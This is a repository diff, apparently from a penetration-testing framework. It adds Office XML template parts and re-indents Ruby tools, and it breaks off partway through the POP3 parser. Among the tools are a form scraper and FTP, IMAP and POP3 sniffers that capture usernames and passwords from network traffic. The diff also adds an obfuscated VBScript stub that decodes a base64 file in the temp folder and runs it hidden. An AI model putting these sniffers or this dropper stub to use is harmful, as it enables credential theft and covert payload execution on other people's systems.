+<w:lsdException w:name="Dark List Accent 6" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful Shading Accent 6" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful List Accent 6" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful Grid Accent 6" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Subtle Emphasis" w:semiHidden="0" w:uiPriority="19" w:unhideWhenUsed="0" w:qFormat="1"/>
+<w:lsdException w:name="Intense Emphasis" w:semiHidden="0" w:uiPriority="21" w:unhideWhenUsed="0" w:qFormat="1"/>
+<w:lsdException w:name="Subtle Reference" w:semiHidden="0" w:uiPriority="31" w:unhideWhenUsed="0" w:qFormat="1"/>
+<w:lsdException w:name="Intense Reference" w:semiHidden="0" w:uiPriority="32" w:unhideWhenUsed="0" w:qFormat="1"/>
+<w:lsdException w:name="Book Title" w:semiHidden="0" w:uiPriority="33" w:unhideWhenUsed="0" w:qFormat="1"/>
+<w:lsdException w:name="Bibliography" w:uiPriority="37"/>
+<w:lsdException w:name="TOC Heading" w:uiPriority="39" w:qFormat="1"/>
+</w:latentStyles>
+<w:style w:type="paragraph" w:default="1" w:styleId="Normal">
+<w:name w:val="Normal"/>
+<w:qFormat/>
+<w:rsid w:val="00063BF6"/>
+</w:style>
+<w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
+<w:name w:val="Default Paragraph Font"/>
+<w:uiPriority w:val="1"/>
+<w:semiHidden/>
+<w:unhideWhenUsed/>
+</w:style>
+<w:style w:type="table" w:default="1" w:styleId="TableNormal">
+<w:name w:val="Normal Table"/>
+<w:uiPriority w:val="99"/>
+<w:semiHidden/>
+<w:unhideWhenUsed/>
+<w:qFormat/>
+<w:tblPr>
+<w:tblInd w:w="0" w:type="dxa"/>
+<w:tblCellMar>
+<w:top w:w="0" w:type="dxa"/>
+<w:left w:w="108" w:type="dxa"/>
+<w:bottom w:w="0" w:type="dxa"/>
+<w:right w:w="108" w:type="dxa"/>
+</w:tblCellMar>
+</w:tblPr>
+</w:style>
+<w:style w:type="numbering" w:default="1" w:styleId="NoList">
+<w:name w:val="No List"/>
+<w:uiPriority w:val="99"/>
+<w:semiHidden/>
+<w:unhideWhenUsed/>
+</w:style>
+<w:style w:type="paragraph" w:styleId="BalloonText">
+<w:name w:val="Balloon Text"/>
+<w:basedOn w:val="Normal"/>
+<w:link w:val="BalloonTextChar"/>
+<w:uiPriority w:val="99"/>
+<w:semiHidden/>
+<w:unhideWhenUsed/>
+<w:rsid w:val="00CD271A"/>
+<w:pPr>
+<w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+</w:pPr>
+<w:rPr>
+<w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+<w:sz w:val="16"/>
+<w:szCs w:val="16"/>
+</w:rPr>
+</w:style>
+<w:style w:type="character" w:customStyle="1" w:styleId="BalloonTextChar">
+<w:name w:val="Balloon Text Char"/>
+<w:basedOn w:val="DefaultParagraphFont"/>
+<w:link w:val="BalloonText"/>
+<w:uiPriority w:val="99"/>
+<w:semiHidden/>
+<w:rsid w:val="00CD271A"/>
+<w:rPr>
+<w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+<w:sz w:val="16"/>
+<w:szCs w:val="16"/>
+</w:rPr>
+</w:style>
+</w:styles>
@@ -0,0 +1,283 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Office Theme">
+<a:themeElements>
+<a:clrScheme name="Office">
+<a:dk1>
+<a:sysClr val="windowText" lastClr="000000"/>
+</a:dk1>
+<a:lt1>
+<a:sysClr val="window" lastClr="FFFFFF"/>
+</a:lt1>
+<a:dk2>
+<a:srgbClr val="1F497D"/>
+</a:dk2>
+<a:lt2>
+<a:srgbClr val="EEECE1"/>
+</a:lt2>
+<a:accent1>
+<a:srgbClr val="4F81BD"/>
+</a:accent1>
+<a:accent2>
+<a:srgbClr val="C0504D"/>
+</a:accent2>
+<a:accent3>
+<a:srgbClr val="9BBB59"/>
+</a:accent3>
+<a:accent4>
+<a:srgbClr val="8064A2"/>
+</a:accent4>
+<a:accent5>
+<a:srgbClr val="4BACC6"/>
+</a:accent5>
+<a:accent6>
+<a:srgbClr val="F79646"/>
+</a:accent6>
+<a:hlink>
+<a:srgbClr val="0000FF"/>
+</a:hlink>
+<a:folHlink>
+<a:srgbClr val="800080"/>
+</a:folHlink>
+</a:clrScheme>
+<a:fontScheme name="Office">
+<a:majorFont>
+<a:latin typeface="Cambria"/>
+<a:ea typeface=""/>
+<a:cs typeface=""/>
+<a:font script="Jpan" typeface="ＭＳ ゴシック"/>
+<a:font script="Hang" typeface="맑은 고딕"/>
+<a:font script="Hans" typeface="宋体"/>
+<a:font script="Hant" typeface="新細明體"/>
+<a:font script="Arab" typeface="Times New Roman"/>
+<a:font script="Hebr" typeface="Times New Roman"/>
+<a:font script="Thai" typeface="Angsana New"/>
+<a:font script="Ethi" typeface="Nyala"/>
+<a:font script="Beng" typeface="Vrinda"/>
+<a:font script="Gujr" typeface="Shruti"/>
+<a:font script="Khmr" typeface="MoolBoran"/>
+<a:font script="Knda" typeface="Tunga"/>
+<a:font script="Guru" typeface="Raavi"/>
+<a:font script="Cans" typeface="Euphemia"/>
+<a:font script="Cher" typeface="Plantagenet Cherokee"/>
+<a:font script="Yiii" typeface="Microsoft Yi Baiti"/>
+<a:font script="Tibt" typeface="Microsoft Himalaya"/>
+<a:font script="Thaa" typeface="MV Boli"/>
+<a:font script="Deva" typeface="Mangal"/>
+<a:font script="Telu" typeface="Gautami"/>
+<a:font script="Taml" typeface="Latha"/>
+<a:font script="Syrc" typeface="Estrangelo Edessa"/>
+<a:font script="Orya" typeface="Kalinga"/>
+<a:font script="Mlym" typeface="Kartika"/>
+<a:font script="Laoo" typeface="DokChampa"/>
+<a:font script="Sinh" typeface="Iskoola Pota"/>
+<a:font script="Mong" typeface="Mongolian Baiti"/>
+<a:font script="Viet" typeface="Times New Roman"/>
+<a:font script="Uigh" typeface="Microsoft Uighur"/>
+<a:font script="Geor" typeface="Sylfaen"/>
+</a:majorFont>
+<a:minorFont>
+<a:latin typeface="Calibri"/>
+<a:ea typeface=""/>
+<a:cs typeface=""/>
+<a:font script="Jpan" typeface="ＭＳ 明朝"/>
+<a:font script="Hang" typeface="맑은 고딕"/>
+<a:font script="Hans" typeface="宋体"/>
+<a:font script="Hant" typeface="新細明體"/>
+<a:font script="Arab" typeface="Arial"/>
+<a:font script="Hebr" typeface="Arial"/>
+<a:font script="Thai" typeface="Cordia New"/>
+<a:font script="Ethi" typeface="Nyala"/>
+<a:font script="Beng" typeface="Vrinda"/>
+<a:font script="Gujr" typeface="Shruti"/>
+<a:font script="Khmr" typeface="DaunPenh"/>
+<a:font script="Knda" typeface="Tunga"/>
+<a:font script="Guru" typeface="Raavi"/>
+<a:font script="Cans" typeface="Euphemia"/>
+<a:font script="Cher" typeface="Plantagenet Cherokee"/>
+<a:font script="Yiii" typeface="Microsoft Yi Baiti"/>
+<a:font script="Tibt" typeface="Microsoft Himalaya"/>
+<a:font script="Thaa" typeface="MV Boli"/>
+<a:font script="Deva" typeface="Mangal"/>
+<a:font script="Telu" typeface="Gautami"/>
+<a:font script="Taml" typeface="Latha"/>
+<a:font script="Syrc" typeface="Estrangelo Edessa"/>
+<a:font script="Orya" typeface="Kalinga"/>
+<a:font script="Mlym" typeface="Kartika"/>
+<a:font script="Laoo" typeface="DokChampa"/>
+<a:font script="Sinh" typeface="Iskoola Pota"/>
+<a:font script="Mong" typeface="Mongolian Baiti"/>
+<a:font script="Viet" typeface="Arial"/>
+<a:font script="Uigh" typeface="Microsoft Uighur"/>
+<a:font script="Geor" typeface="Sylfaen"/>
+</a:minorFont>
+</a:fontScheme>
+<a:fmtScheme name="Office">
+<a:fillStyleLst>
+<a:solidFill>
+<a:schemeClr val="phClr"/>
+</a:solidFill>
+<a:gradFill rotWithShape="1">
+<a:gsLst>
+<a:gs pos="0">
+<a:schemeClr val="phClr">
+<a:tint val="50000"/>
+<a:satMod val="300000"/>
+</a:schemeClr>
+</a:gs>
+<a:gs pos="35000">
+<a:schemeClr val="phClr">
+<a:tint val="37000"/>
+<a:satMod val="300000"/>
+</a:schemeClr>
+</a:gs>
+<a:gs pos="100000">
+<a:schemeClr val="phClr">
+<a:tint val="15000"/>
+<a:satMod val="350000"/>
+</a:schemeClr>
+</a:gs>
+</a:gsLst>
+<a:lin ang="16200000" scaled="1"/>
+</a:gradFill>
+<a:gradFill rotWithShape="1">
+<a:gsLst>
+<a:gs pos="0">
+<a:schemeClr val="phClr">
+<a:shade val="51000"/>
+<a:satMod val="130000"/>
+</a:schemeClr>
+</a:gs>
+<a:gs pos="80000">
+<a:schemeClr val="phClr">
+<a:shade val="93000"/>
+<a:satMod val="130000"/>
+</a:schemeClr>
+</a:gs>
+<a:gs pos="100000">
+<a:schemeClr val="phClr">
+<a:shade val="94000"/>
+<a:satMod val="135000"/>
+</a:schemeClr>
+</a:gs>
+</a:gsLst>
+<a:lin ang="16200000" scaled="0"/>
+</a:gradFill>
+</a:fillStyleLst>
+<a:lnStyleLst>
+<a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+<a:solidFill>
+<a:schemeClr val="phClr">
+<a:shade val="95000"/>
+<a:satMod val="105000"/>
+</a:schemeClr>
+</a:solidFill>
+<a:prstDash val="solid"/>
+</a:ln>
+<a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
+<a:solidFill>
+<a:schemeClr val="phClr"/>
+</a:solidFill>
+<a:prstDash val="solid"/>
+</a:ln>
+<a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
+<a:solidFill>
+<a:schemeClr val="phClr"/>
+</a:solidFill>
+<a:prstDash val="solid"/>
+</a:ln>
+</a:lnStyleLst>
+<a:effectStyleLst>
+<a:effectStyle>
+<a:effectLst>
+<a:outerShdw blurRad="40000" dist="20000" dir="5400000" rotWithShape="0">
+<a:srgbClr val="000000">
+<a:alpha val="38000"/>
+</a:srgbClr>
+</a:outerShdw>
+</a:effectLst>
+</a:effectStyle>
+<a:effectStyle>
+<a:effectLst>
+<a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
+<a:srgbClr val="000000">
+<a:alpha val="35000"/>
+</a:srgbClr>
+</a:outerShdw>
+</a:effectLst>
+</a:effectStyle>
+<a:effectStyle>
+<a:effectLst>
+<a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
+<a:srgbClr val="000000">
+<a:alpha val="35000"/>
+</a:srgbClr>
+</a:outerShdw>
+</a:effectLst>
+<a:scene3d>
+<a:camera prst="orthographicFront">
+<a:rot lat="0" lon="0" rev="0"/>
+</a:camera>
+<a:lightRig rig="threePt" dir="t">
+<a:rot lat="0" lon="0" rev="1200000"/>
+</a:lightRig>
+</a:scene3d>
+<a:sp3d>
+<a:bevelT w="63500" h="25400"/>
+</a:sp3d>
+</a:effectStyle>
+</a:effectStyleLst>
+<a:bgFillStyleLst>
+<a:solidFill>
+<a:schemeClr val="phClr"/>
+</a:solidFill>
+<a:gradFill rotWithShape="1">
+<a:gsLst>
+<a:gs pos="0">
+<a:schemeClr val="phClr">
+<a:tint val="40000"/>
+<a:satMod val="350000"/>
+</a:schemeClr>
+</a:gs>
+<a:gs pos="40000">
+<a:schemeClr val="phClr">
+<a:tint val="45000"/>
+<a:shade val="99000"/>
+<a:satMod val="350000"/>
+</a:schemeClr>
+</a:gs>
+<a:gs pos="100000">
+<a:schemeClr val="phClr">
+<a:shade val="20000"/>
+<a:satMod val="255000"/>
+</a:schemeClr>
+</a:gs>
+</a:gsLst>
+<a:path path="circle">
+<a:fillToRect l="50000" t="-80000" r="50000" b="180000"/>
+</a:path>
+</a:gradFill>
+<a:gradFill rotWithShape="1">
+<a:gsLst>
+<a:gs pos="0">
+<a:schemeClr val="phClr">
+<a:tint val="80000"/>
+<a:satMod val="300000"/>
+</a:schemeClr>
+</a:gs>
+<a:gs pos="100000">
+<a:schemeClr val="phClr">
+<a:shade val="30000"/>
+<a:satMod val="200000"/>
+</a:schemeClr>
+</a:gs>
+</a:gsLst>
+<a:path path="circle">
+<a:fillToRect l="50000" t="50000" r="50000" b="50000"/>
+</a:path>
+</a:gradFill>
+</a:bgFillStyleLst>
+</a:fmtScheme>
+</a:themeElements>
+<a:objectDefaults/>
+<a:extraClrSchemeLst/>
+</a:theme>
@@ -0,0 +1,4 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:webSettings xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
+<w:optimizeForBrowser/>
+</w:webSettings>
@@ -15,8 +15,8 @@ require 'open-uri'
 require 'timeout'

 def usage
-	$stderr.puts "#{$0} [site list] [output-dir]"
-	exit(0)
+  $stderr.puts "#{$0} [site list] [output-dir]"
+  exit(0)
 end

 input = ARGV.shift() || usage()
@@ -25,32 +25,32 @@ res = ""
 doc = Hpricot(File.open(input))
 doc.search("//form").each do |form|

-	# Extract the form
-	res = "<form"
-	form.attributes.each do |attr|
-		res << " #{attr[0]}='#{attr[1].gsub("'", "")}'"
-	end
-	res << "> "
+  # Extract the form
+  res = "<form"
+  form.attributes.each do |attr|
+    res << " #{attr[0]}='#{attr[1].gsub("'", "")}'"
+  end
+  res << "> "

-	# Strip out the value
-	form.search("//input") do |inp|
+  # Strip out the value
+  form.search("//input") do |inp|

-		inp.attributes.keys.each do |ikey|
-			if (ikey.downcase == "value")
-				inp[ikey] = ""
-				next
-			end
+    inp.attributes.keys.each do |ikey|
+      if (ikey.downcase == "value")
+        inp[ikey] = ""
+        next
+      end

-			if(inp.attributes[ikey] =~ /^http/i)
-				inp[ikey] = ""
-				next
-			end
+      if(inp.attributes[ikey] =~ /^http/i)
+        inp[ikey] = ""
+        next
+      end

-		end
+    end

-		res << inp.to_html
-	end
-	res << "</form>"
+    res << inp.to_html
+  end
+  res << "</form>"
 end

 $stdout.puts res
@@ -15,72 +15,72 @@ require 'open-uri'
 require 'timeout'

 def usage
-	$stderr.puts "#{$0} [site list] [output-dir]"
-	exit(0)
+  $stderr.puts "#{$0} [site list] [output-dir]"
+  exit(0)
 end

 sitelist = ARGV.shift() || usage()
 output   = ARGV.shift() || usage()

 File.readlines(sitelist).each do |site|
-	site.strip!
-	next if site.length == 0
-	next if site =~ /^#/
-	
-	out = File.join(output, site + ".txt")
-	File.unlink(out) if File.exists?(out)
-	
-	fd  = File.open(out, "a")
-	
+  site.strip!
+  next if site.length == 0
+  next if site =~ /^#/
+  
+  out = File.join(output, site + ".txt")
+  File.unlink(out) if File.exists?(out)
+  
+  fd  = File.open(out, "a")
+  

-	["", "www."].each do |prefix|
-		begin
-			Timeout.timeout(10) do 
-				doc = Hpricot(open("http://#{prefix}#{site}/"))
-				doc.search("//form").each do |form|
+  ["", "www."].each do |prefix|
+    begin
+      Timeout.timeout(10) do 
+        doc = Hpricot(open("http://#{prefix}#{site}/"))
+        doc.search("//form").each do |form|

-					# Extract the form
-					res = "<form"
-					form.attributes.each do |attr|
-						res << " #{attr[0]}='#{attr[1].gsub("'", "")}'"
-					end
-					res << "> "
+          # Extract the form
+          res = "<form"
+          form.attributes.each do |attr|
+            res << " #{attr[0]}='#{attr[1].gsub("'", "")}'"
+          end
+          res << "> "

-					# Strip out the value
-					form.search("//input") do |inp|
+          # Strip out the value
+          form.search("//input") do |inp|

-						inp.attributes.keys.each do |ikey|
-							if (ikey.downcase == "value")
-								inp[ikey] = ""
-								next
-							end
+            inp.attributes.keys.each do |ikey|
+              if (ikey.downcase == "value")
+                inp[ikey] = ""
+                next
+              end

-							if(inp.attributes[ikey] =~ /^http/i)
-								inp[ikey] = ""
-								next
-							end
+              if(inp.attributes[ikey] =~ /^http/i)
+                inp[ikey] = ""
+                next
+              end

-						end
+            end

-						res << inp.to_html
-					end
-					res << "</form>"
+            res << inp.to_html
+          end
+          res << "</form>"

-					fd.write(res)
-				end
-			end
-			break
-		rescue ::Timeout::Error
-			$stderr.puts "#{prefix}#{site} timed out"
-		rescue ::Interrupt
-			raise $!
-		rescue ::Exception => e
-			$stderr.puts "#{prefix}#{site} #{e.class} #{e}"
-		end
-	end
-	
-	fd.close
-	
-	File.unlink(out) if (File.size(out) == 0)
+          fd.write(res)
+        end
+      end
+      break
+    rescue ::Timeout::Error
+      $stderr.puts "#{prefix}#{site} timed out"
+    rescue ::Interrupt
+      raise $!
+    rescue ::Exception => e
+      $stderr.puts "#{prefix}#{site} #{e.class} #{e}"
+    end
+  end
+  
+  fd.close
+  
+  File.unlink(out) if (File.size(out) == 0)

 end
@@ -0,0 +1,49 @@
+echo Dim encodedFile, decodedFile, scriptingFS, scriptShell, emptyString, tempString, Base64Chars, tempDir >>decode_stub
+echo encodedFile = Chr(92)+CHRENCFILE >>decode_stub
+echo decodedFile = Chr(92)+CHRDECFILE >>decode_stub
+echo scriptingFS = Chr(83)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(105)+Chr(110)+Chr(103)+Chr(46)+Chr(70)+Chr(105)+Chr(108)+Chr(101)+Chr(83)+Chr(121)+Chr(115)+Chr(116)+Chr(101)+Chr(109)+Chr(79)+Chr(98)+Chr(106)+Chr(101)+Chr(99)+Chr(116) >>decode_stub
+echo scriptShell = Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(83)+Chr(104)+Chr(101)+Chr(108)+Chr(108) >>decode_stub
+echo emptyString = Chr(84)+Chr(104)+Chr(101)+Chr(32)+Chr(102)+Chr(105)+Chr(108)+Chr(101)+Chr(32)+Chr(105)+Chr(115)+Chr(32)+Chr(101)+Chr(109)+Chr(112)+Chr(116)+Chr(121)+Chr(46)>>decode_stub
+echo tempString  = Chr(37)+Chr(84)+Chr(69)+Chr(77)+Chr(80)+Chr(37) >>decode_stub
+echo Base64Chars = Chr(65)+Chr(66)+Chr(67)+Chr(68)+Chr(69)+Chr(70)+Chr(71)+Chr(72)+Chr(73)+Chr(74)+Chr(75)+Chr(76)+Chr(77)+Chr(78)+Chr(79)+Chr(80)+Chr(81)+Chr(82)+Chr(83)+Chr(84)+Chr(85)+Chr(86)+Chr(87)+Chr(88)+Chr(89)+Chr(90)+Chr(97)+Chr(98)+Chr(99)+Chr(100)+Chr(101)+Chr(102)+Chr(103)+Chr(104)+Chr(105)+Chr(106)+Chr(107)+Chr(108)+Chr(109)+Chr(110)+Chr(111)+Chr(112)+Chr(113)+Chr(114)+Chr(115)+Chr(116)+Chr(117)+Chr(118)+Chr(119)+Chr(120)+Chr(121)+Chr(122)+Chr(48)+Chr(49)+Chr(50)+Chr(51)+Chr(52)+Chr(53)+Chr(54)+Chr(55)+Chr(56)+Chr(57)+Chr(43)+Chr(47) >>decode_stub
+echo Set wshShell = CreateObject(scriptShell) >>decode_stub
+echo tempDir = wshShell.ExpandEnvironmentStrings(tempString) >>decode_stub
+echo Set fs = CreateObject(scriptingFS) >>decode_stub
+echo Set file = fs.GetFile(tempDir+encodedFile) >>decode_stub
+echo If file.Size Then >>decode_stub
+echo Set fd = fs.OpenTextFile(tempDir+encodedFile, 1) >>decode_stub
+echo data = fd.ReadAll >>decode_stub
+echo data = Replace(data, Chr(32)+vbCrLf, nil) >>decode_stub
+echo data = Replace(data, vbCrLf, nil) >>decode_stub
+echo data = base64_decode(data) >>decode_stub
+echo fd.Close >>decode_stub
+echo Set ofs = CreateObject(scriptingFS).OpenTextFile(tempDir+decodedFile, 2, True) >>decode_stub
+echo ofs.Write data >>decode_stub
+echo ofs.close >>decode_stub
+echo wshShell.run tempDir+decodedFile, 0, false >>decode_stub
+echo Else >>decode_stub
+echo Wscript.Echo emptyString >>decode_stub
+echo End If >>decode_stub
+echo Function base64_decode(byVal strIn) >>decode_stub
+echo Dim w1, w2, w3, w4, n, strOut >>decode_stub
+echo For n = 1 To Len(strIn) Step 4 >>decode_stub
+echo w1 = mimedecode(Mid(strIn, n, 1)) >>decode_stub
+echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>decode_stub
+echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>decode_stub
+echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>decode_stub
+echo If Not w2 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>decode_stub
+echo If  Not w3 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>decode_stub
+echo If Not w4 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>decode_stub
+echo Next >>decode_stub
+echo base64_decode = strOut >>decode_stub
+echo End Function >>decode_stub
+echo Function mimedecode(byVal strIn) >>decode_stub
+echo If Len(strIn) = 0 Then >>decode_stub
+echo mimedecode = -1 : Exit Function >>decode_stub
+echo Else >>decode_stub
+echo mimedecode = InStr(Base64Chars, strIn) - 1 >>decode_stub
+echo End If >>decode_stub
+echo End Function >>decode_stub
@@ -8,71 +8,71 @@

 class SnifferFTP < BaseProtocolParser

-	def register_sigs
-		self.sigs = {
-			:banner		=> /^(220\s*[^\r\n]+)/i,
-			:user		=> /^USER\s+([^\s]+)/i,
-			:pass		=> /^PASS\s+([^\s]+)/i,
-			:login_pass => /^(230\s*[^\n]+)/i,
-			:login_fail => /^(5\d\d\s*[^\n]+)/i,
-			:bye      => /^221/
-		}
-	end
+  def register_sigs
+    self.sigs = {
+      :banner		=> /^(220\s*[^\r\n]+)/i,
+      :user		=> /^USER\s+([^\s]+)/i,
+      :pass		=> /^PASS\s+([^\s]+)/i,
+      :login_pass => /^(230\s*[^\n]+)/i,
+      :login_fail => /^(5\d\d\s*[^\n]+)/i,
+      :bye      => /^221/
+    }
+  end

-	def parse(pkt)
-		# We want to return immediatly if we do not have a packet which is handled by us
-		return unless pkt.is_tcp?
-		return if (pkt.tcp_sport != 21 and pkt.tcp_dport != 21)
-		s = find_session((pkt.tcp_sport == 21) ? get_session_src(pkt) : get_session_dst(pkt))
-		s[:sname] ||= "ftp"
+  def parse(pkt)
+    # We want to return immediatly if we do not have a packet which is handled by us
+    return unless pkt.is_tcp?
+    return if (pkt.tcp_sport != 21 and pkt.tcp_dport != 21)
+    s = find_session((pkt.tcp_sport == 21) ? get_session_src(pkt) : get_session_dst(pkt))
+    s[:sname] ||= "ftp"

-		self.sigs.each_key do |k|
-			# There is only one pattern per run to test
-			matched = nil
-			matches = nil
+    self.sigs.each_key do |k|
+      # There is only one pattern per run to test
+      matched = nil
+      matches = nil

-			if(pkt.payload =~ self.sigs[k])
-				matched = k
-				matches = $1
-			end
+      if(pkt.payload =~ self.sigs[k])
+        matched = k
+        matches = $1
+      end

-			case matched
+      case matched

-			when :login_fail
-				if(s[:user] and s[:pass])
-					report_auth_info(s.merge({:active => false}))
-					print_status("Failed FTP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]}")
+      when :login_fail
+        if(s[:user] and s[:pass])
+          report_auth_info(s.merge({:active => false}))
+          print_status("Failed FTP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]}")

-					s[:pass] = ""
-					return
-				end
+          s[:pass] = ""
+          return
+        end

-			when :login_pass
-				if(s[:user] and s[:pass])
-					report_auth_info(s)
-					print_status("Successful FTP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]}")
-					# Remove it form the session objects so freeup memory
-					sessions.delete(s[:session])
-					return
-				end
+      when :login_pass
+        if(s[:user] and s[:pass])
+          report_auth_info(s)
+          print_status("Successful FTP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]}")
+          # Remove it form the session objects so freeup memory
+          sessions.delete(s[:session])
+          return
+        end

-			when :banner
-				# Because some ftp server send multiple banner we take only the first one and ignore the rest
-				if not (s[:info])
-					s[:info] = matches
-					report_service(s)
-				end
+      when :banner
+        # Because some ftp server send multiple banner we take only the first one and ignore the rest
+        if not (s[:info])
+          s[:info] = matches
+          report_service(s)
+        end

-			when :bye
-				sessions.delete(s[:session])
+      when :bye
+        sessions.delete(s[:session])

-			when nil
-				# No matches, no saved state
-			else
-				sessions[s[:session]].merge!({k => matches})
-			end # end case matched
+      when nil
+        # No matches, no saved state
+      else
+        sessions[s[:session]].merge!({k => matches})
+      end # end case matched

-		end # end of each_key
-	end # end of parse
+    end # end of each_key
+  end # end of parse
 end

@@ -9,72 +9,72 @@

 class SnifferIMAP < BaseProtocolParser

-	def register_sigs
-		self.sigs = {
-			:banner		=> /^(\*\s+OK[^\n\r]*)/i,
-			:login		=> /^CAPABILITY\s+LOGIN\s+([^\s]+)\s+([^\n\r]+)/i,
-			:login_pass => /^CAPABILITY\s+OK\s+(Login[^\n\r]*)/i,
-			:login_bad	=> /^CAPABILITY\s+BAD\s+(Login[^\n\r]*)/i,
-			:login_fail => /^CAPABILITY\s+NO\s+(Login[^\n\r]*)/i
-		}
-	end
+  def register_sigs
+    self.sigs = {
+      :banner		=> /^(\*\s+OK[^\n\r]*)/i,
+      :login		=> /^CAPABILITY\s+LOGIN\s+([^\s]+)\s+([^\n\r]+)/i,
+      :login_pass => /^CAPABILITY\s+OK\s+(Login[^\n\r]*)/i,
+      :login_bad	=> /^CAPABILITY\s+BAD\s+(Login[^\n\r]*)/i,
+      :login_fail => /^CAPABILITY\s+NO\s+(Login[^\n\r]*)/i
+    }
+  end

-	def parse(pkt)
+  def parse(pkt)

-		# We want to return immediatly if we do not have a packet which is handled by us
-		return unless pkt.is_tcp?
-		return if (pkt.tcp_sport != 143 and pkt.tcp_dport != 143)
-		s = find_session((pkt.tcp_sport == 143) ? get_session_src(pkt) : get_session_dst(pkt))
-		s[:sname] ||= "imap4"
+    # We want to return immediatly if we do not have a packet which is handled by us
+    return unless pkt.is_tcp?
+    return if (pkt.tcp_sport != 143 and pkt.tcp_dport != 143)
+    s = find_session((pkt.tcp_sport == 143) ? get_session_src(pkt) : get_session_dst(pkt))
+    s[:sname] ||= "imap4"

-		self.sigs.each_key do |k|
-			# There is only one pattern per run to test
-			matched = nil
-			matches = nil
+    self.sigs.each_key do |k|
+      # There is only one pattern per run to test
+      matched = nil
+      matches = nil

-			if (pkt.payload =~ self.sigs[k])
-				matched = k
-				matches = [$1,$2]
-			end
+      if (pkt.payload =~ self.sigs[k])
+        matched = k
+        matches = [$1,$2]
+      end

-			case matched
-			when :banner
-				s[:info] = matches
-				report_service(s)
+      case matched
+      when :banner
+        s[:info] = matches
+        report_service(s)

-			when :login_pass
+      when :login_pass

-				report_auth_info(s)
-				print_status("Successful IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
+        report_auth_info(s)
+        print_status("Successful IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")

-				# Remove it form the session objects so freeup
-				sessions.delete(s[:session])
+        # Remove it form the session objects so freeup
+        sessions.delete(s[:session])

-			when :login_fail
+      when :login_fail

-				report_auth_info(s.merge({:active => false}))
-				print_status("Failed IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
+        report_auth_info(s.merge({:active => false}))
+        print_status("Failed IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")

-				# Remove it form the session objects so freeup
-				sessions.delete(s[:session])
+        # Remove it form the session objects so freeup
+        sessions.delete(s[:session])

-			when :login_bad
-				report_auth_info(s.merge({:active => false}))
-				print_status("Bad IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
+      when :login_bad
+        report_auth_info(s.merge({:active => false}))
+        print_status("Bad IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")

-				# Remove it form the session objects so freeup
-				sessions.delete(s[:session])
+        # Remove it form the session objects so freeup
+        sessions.delete(s[:session])

-			when :login
-				s[:user]=$1
-				s[:pass]=$2
+      when :login
+        s[:user]=$1
+        s[:pass]=$2

-			when nil
-				# No matches, no saved state
-			else
-				sessions[s[:session]].merge!({k => matches})
-			end # end case matched
-		end # end of each_key
-	end # end of parse
+      when nil
+        # No matches, no saved state
+      else
+        sessions[s[:session]].merge!({k => matches})
+      end # end case matched
+    end # end of each_key
+  end # end of parse
 end

@@ -6,83 +6,83 @@
 # as unsuccessful logins... (Typos are common :-) )
 #
 class SnifferPOP3 < BaseProtocolParser
-	def register_sigs
-		self.sigs = {
-			:ok				=> /^(\+OK[^\n]*)\n/i,
-			:err			=> /^(\-ERR[^\n]*)\n/i,
-			:user			=> /^USER\s+([^\n]+)\n/i,
-			:pass			=> /^PASS\s+([^\n]+)\n/i,
-			:quit			=> /^(QUIT\s*[^\n]*)\n/i
-		}
-	end
+  def register_sigs
+    self.sigs = {
+      :ok				=> /^(\+OK[^\n]*)\n/i,
+      :err			=> /^(\-ERR[^\n]*)\n/i,
+      :user			=> /^USER\s+([^\n]+)\n/i,
+      :pass			=> /^PASS\s+([^\n]+)\n/i,
+      :quit			=> /^(QUIT\s*[^\n]*)\n/i
+    }
+  end

-	def parse(pkt)
-		# We want to return immediatly if we do not have a packet which is handled by us
-		return unless pkt.is_tcp?
-		return if (pkt.tcp_sport != 110 and pkt.tcp_dport != 110)
-		s = find_session((pkt.tcp_sport == 110) ? get_session_src(pkt) : get_session_dst(pkt))
+  def parse(pkt)
